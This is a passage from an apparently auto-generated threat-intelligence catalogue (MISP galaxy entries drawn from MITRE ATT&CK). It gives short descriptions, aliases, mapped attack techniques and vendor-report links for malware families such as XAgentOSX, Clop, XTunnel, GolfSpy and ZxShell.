Table 4806. Table References
Links
https://attack.mitre.org/software/S0511
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

XAgentOSX - S0161

[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)

The tag is: misp-galaxy:mitre-malware="XAgentOSX - S0161"

XAgentOSX - S0161 is also known as:

XAgentOSX
OSX.Sofacy

View relationships graph

XAgentOSX - S0161 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 4807. Table References
Links
https://attack.mitre.org/software/S0161
https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

Clop - S0611

[Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021)

The tag is: misp-galaxy:mitre-malware="Clop - S0611"

Clop - S0611 is also known as:

Clop

View relationships graph

Clop - S0611 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Language Discovery - T1614.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 4808. Table References
Links
https://attack.mitre.org/software/S0611
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/
https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware
https://unit42.paloaltonetworks.com/clop-ransomware/

Felismus - S0171

[Felismus](https://attack.mitre.org/software/S0171) is a modular backdoor that has been used by [Sowbug](https://attack.mitre.org/groups/G0054). (Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)

The tag is: misp-galaxy:mitre-malware="Felismus - S0171"

Felismus - S0171 is also known as:

Felismus

View relationships graph

Felismus - S0171 has relationships with:

similar: misp-galaxy:malpedia="Felismus" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4809. Table References
Links
https://attack.mitre.org/software/S0171
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments
https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware

XTunnel - S0117

[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-malware="XTunnel - S0117"

XTunnel - S0117 is also known as:

XTunnel
Trojan.Shunnael
X-Tunnel
XAPS

View relationships graph

XTunnel - S0117 has relationships with:

similar: misp-galaxy:tool="X-Tunnel" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="XTunnel" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 4810. Table References
Links
https://attack.mitre.org/software/S0117
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
https://www.invincea.com/2016/07/tunnel-of-gov-dnc-hack-and-the-russian-xtunnel/
http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

FALLCHILL - S0181

[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)

The tag is: misp-galaxy:mitre-malware="FALLCHILL - S0181"

FALLCHILL - S0181 is also known as:

FALLCHILL

View relationships graph

FALLCHILL - S0181 has relationships with:

similar: misp-galaxy:rat="FALLCHILL" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Volgmer" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:tool="Volgmer" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4811. Table References
Links
https://attack.mitre.org/software/S0181
https://www.us-cert.gov/ncas/alerts/TA17-318A

Nidiran - S0118

[Nidiran](https://attack.mitre.org/software/S0118) is a custom backdoor developed and used by [Suckfly](https://attack.mitre.org/groups/G0039). It has been delivered via strategic web compromise. (Citation: Symantec Suckfly March 2016)

The tag is: misp-galaxy:mitre-malware="Nidiran - S0118"

Nidiran - S0118 is also known as:

Nidiran
Backdoor.Nidiran

View relationships graph

Nidiran - S0118 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

Table 4812. Table References
Links
https://attack.mitre.org/software/S0118
http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates

Concipit1248 - S0426

[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)

The tag is: misp-galaxy:mitre-malware="Concipit1248 - S0426"

Concipit1248 - S0426 is also known as:

Concipit1248
Corona Updates

View relationships graph

Concipit1248 - S0426 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"

Table 4813. Table References
Links
https://attack.mitre.org/software/S0426
https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/

CORALDECK - S0212

[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="CORALDECK - S0212"

CORALDECK - S0212 is also known as:

CORALDECK

View relationships graph

CORALDECK - S0212 has relationships with:

similar: misp-galaxy:tool="CORALDECK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4814. Table References
Links
https://attack.mitre.org/software/S0212
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

Umbreon - S0221

A Linux rootkit that provides backdoor access and hides from defenders.

The tag is: misp-galaxy:mitre-malware="Umbreon - S0221"

Umbreon - S0221 is also known as:

Umbreon

View relationships graph

Umbreon - S0221 has relationships with:

similar: misp-galaxy:tool="Umbreon" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:malpedia="Umbreon" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 4815. Table References
Links
https://attack.mitre.org/software/S0221
https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046

DOGCALL - S0213

[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="DOGCALL - S0213"

DOGCALL - S0213 is also known as:

DOGCALL

View relationships graph

DOGCALL - S0213 has relationships with:

similar: misp-galaxy:tool="DOGCALL" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 4816. Table References
Links
https://attack.mitre.org/software/S0213
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

HummingWhale - S0321

[HummingWhale](https://attack.mitre.org/software/S0321) is an Android malware family that performs ad fraud. (Citation: ArsTechnica-HummingWhale)

The tag is: misp-galaxy:mitre-malware="HummingWhale - S0321"

HummingWhale - S0321 is also known as:

HummingWhale

View relationships graph

HummingWhale - S0321 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472" with estimative-language:likelihood-probability="almost-certain"

Table 4817. Table References
Links
https://attack.mitre.org/software/S0321
http://arstechnica.com/security/2017/01/virulent-android-malware-returns-gets-2-million-downloads-on-google-play/

WireLurker - S0312

[WireLurker](https://attack.mitre.org/software/S0312) is a family of macOS malware that targets iOS devices connected over USB. (Citation: PaloAlto-WireLurker)

The tag is: misp-galaxy:mitre-malware="WireLurker - S0312"

WireLurker - S0312 is also known as:

WireLurker

View relationships graph

WireLurker - S0312 has relationships with:

similar: misp-galaxy:malpedia="WireLurker (OS X)" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Exploit via Charging Station or PC - T1458" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"

Table 4818. Table References
Links
https://attack.mitre.org/software/S0312
https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/

RATANKBA - S0241

[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)

The tag is: misp-galaxy:mitre-malware="RATANKBA - S0241"

RATANKBA - S0241 is also known as:

RATANKBA

View relationships graph

RATANKBA - S0241 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 4819. Table References
Links
https://attack.mitre.org/software/S0241
https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html
https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/

HAPPYWORK - S0214

[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)

The tag is: misp-galaxy:mitre-malware="HAPPYWORK - S0214"

HAPPYWORK - S0214 is also known as:

HAPPYWORK

View relationships graph

HAPPYWORK - S0214 has relationships with:

similar: misp-galaxy:tool="HAPPYWORK" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 4820. Table References
Links
https://attack.mitre.org/software/S0214
https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

StreamEx - S0142

[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)

The tag is: misp-galaxy:mitre-malware="StreamEx - S0142"

StreamEx - S0142 is also known as:

StreamEx

View relationships graph

StreamEx - S0142 has relationships with:

similar: misp-galaxy:tool="StreamEx" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4821. Table References
Links
https://attack.mitre.org/software/S0142
https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar

GolfSpy - S0421

[GolfSpy](https://attack.mitre.org/software/S0421) is Android spyware deployed by the group [Bouncing Golf](https://attack.mitre.org/groups/G0097).(Citation: Trend Micro Bouncing Golf 2019)

The tag is: misp-galaxy:mitre-malware="GolfSpy - S0421"

GolfSpy - S0421 is also known as:

GolfSpy

View relationships graph

GolfSpy - S0421 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Clipboard Data - T1414" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Audio - T1429" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"

Table 4822. Table References
Links
https://attack.mitre.org/software/S0421
https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/

Pisloader - S0124

[Pisloader](https://attack.mitre.org/software/S0124) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://attack.mitre.org/groups/G0026) and is similar to another malware family, [HTTPBrowser](https://attack.mitre.org/software/S0070), that has been used by the group. (Citation: Palo Alto DNS Requests)

The tag is: misp-galaxy:mitre-malware="Pisloader - S0124"

Pisloader - S0124 is also known as:

Pisloader

View relationships graph

Pisloader - S0124 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4823. Table References
Links
https://attack.mitre.org/software/S0124
http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/

ZxShell - S0412

[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )

The tag is: misp-galaxy:mitre-malware="ZxShell - S0412"

ZxShell - S0412 is also known as:

ZxShell
Sensocode

View relationships graph

ZxShell - S0412 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
